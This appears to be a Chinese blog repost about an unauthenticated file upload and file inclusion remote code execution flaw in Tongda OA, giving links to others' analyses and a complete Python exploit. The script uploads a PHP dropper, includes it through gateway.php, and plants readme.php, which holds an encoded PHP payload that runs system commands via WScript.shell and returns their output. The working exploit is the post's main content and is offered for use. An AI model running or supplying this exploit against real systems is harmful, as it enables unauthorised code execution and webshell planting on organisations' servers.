通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞

其他 2020-03-18 20:34:07 阅读次数: 0

通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞

本来想分析一下，后来发现文件都是加密的，虽然说代码是PHPzend 5.4加密的，可以解密，但是兴趣过了，就发一下师傅的分析过程和exp吧：
1，http://blog.fuzz.pub/2020/03/17/%E9%80%9A%E8%BE%BEoa%20RCE%20%E5%88%86%E6%9E%90/#more
2，https://www.t00ls.net/articles-55461.html
3，https://www.anquanke.com/post/id/201174
exp:

import os
import requests
# author :print("")
proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}
if not os.path.exists('1.txt'):
    f=open('1.txt','w')
    f.write('''<?php
$fp = fopen('readme.php', 'w');
$a = base64_decode("JTNDJTNGcGhwJTBBJTI0Y29tbWFuZCUzRCUyMndob2FtaSUyMiUzQiUwQSUyNHdzaCUyMCUzRCUyMG5ldyUyMENPTSUyOCUyN1dTY3JpcHQuc2hlbGwlMjclMjklM0IlMEElMjRleGVjJTIwJTNEJTIwJTI0d3NoLSUzRWV4ZWMlMjglMjJjbWQlMjAvYyUyMCUyMi4lMjRjb21tYW5kJTI5JTNCJTBBJTI0c3Rkb3V0JTIwJTNEJTIwJTI0ZXhlYy0lM0VTdGRPdXQlMjglMjklM0IlMEElMjRzdHJvdXRwdXQlMjAlM0QlMjAlMjRzdGRvdXQtJTNFUmVhZEFsbCUyOCUyOSUzQiUwQWVjaG8lMjAlMjRzdHJvdXRwdXQlM0IlMEElM0YlM0U=");
fwrite($fp, urldecode($a));
fclose($fp);
?>
''')
    f.close()

upload_url = "http://192.168.1.145:8181/ispirit/im/upload.php"
include_url = "http://192.168.1.145:8181/ispirit/interface/gateway.php"
shell_url="http://192.168.1.145:8181/ispirit/interface/readme.php"
files = {'ATTACHMENT':open('1.txt','r')}
upload_data={"P":"123","DEST_UID":"1","UPLOAD_MODE":"2"}
upload_res = requests.post(upload_url,upload_data,files=files,proxies=proxies)
path = upload_res.text
path = path[path.find('@')+1:path.rfind('|')].replace("_","\/").replace("|",".")
include_data = {"json":"{\"url\":\"/general/../../attach/im/" +path+"\"}"}
include_res = requests.post(include_url,data=include_data,proxies=proxies)
shell_res=requests.get(shell_url)
print(shell_res.text)

猜你喜欢

转载自www.cnblogs.com/v01cano/p/12519878.html

通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞

通达OA任意文件上传并利用文件包含导致远程代码执行漏洞分析

通达OA文件上传+文件包含导致远程代码执行漏洞复现

通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现

通达OA 任意文件上传+文件包含导致RCE

通达OA 文件上传+任意文件包含漏洞分析

通达OA任意文件上传和文件包含漏洞导致RCE

通达OA任意文件上传、文件包含、RCE——EXP

致远OA-ajax.do任意文件上传漏洞

通达OA任意文件上传+包含getshell复现分析

phpMyAdmin Transformation 任意文件包含/远程代码执行漏洞

某OA ajax.do 未授权漏洞任意文件上传getshell复现

某oa 11.10 未授权任意文件上传

【漏洞复现】Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取

通达OA任意文件上传+文件包含GetShell/包含日志文件Getshell

3.13通达OA任意文件上传+包含复现分析

WebLogic 任意文件上传远程代码执行漏洞（CVE-2018-2894）------->>>任意文件上传检测POC

「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现

WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现

【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

Apache Flink任意Jar包上传导致远程代码执行漏洞复现

Weblogic 两处未授权任意文件上传漏洞(CVE-2018-2894）

Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)

vmware未授权任意文件读取漏洞分析

【漏洞复现】Vmware vcenter未授权任意文件RCE

通达OA远程代码执行漏洞通告

XXL-JOB 针对未授权访问导致远程命令执行漏洞的声明

泛微OA云桥未授权任意文件读取

PHP：ThinkCMFX任意文件包含漏洞

任意文件包含漏洞（1）

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

Java基础复习_day13_Collection集合

2018.11.16 c语言学习经验

且看Java内置四大核心函数式接口

小程序云开发中数据库的数据分段和显示图片

python的函数

Web-JS进阶

【干货】C++常用代码积累笔记大全

Spring的ioc操作与 IOC底层原理

构建之法20191121-11 Scrum立会报告+燃尽图 07

Spring boot之Hello World访问404

每日归档

更多

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)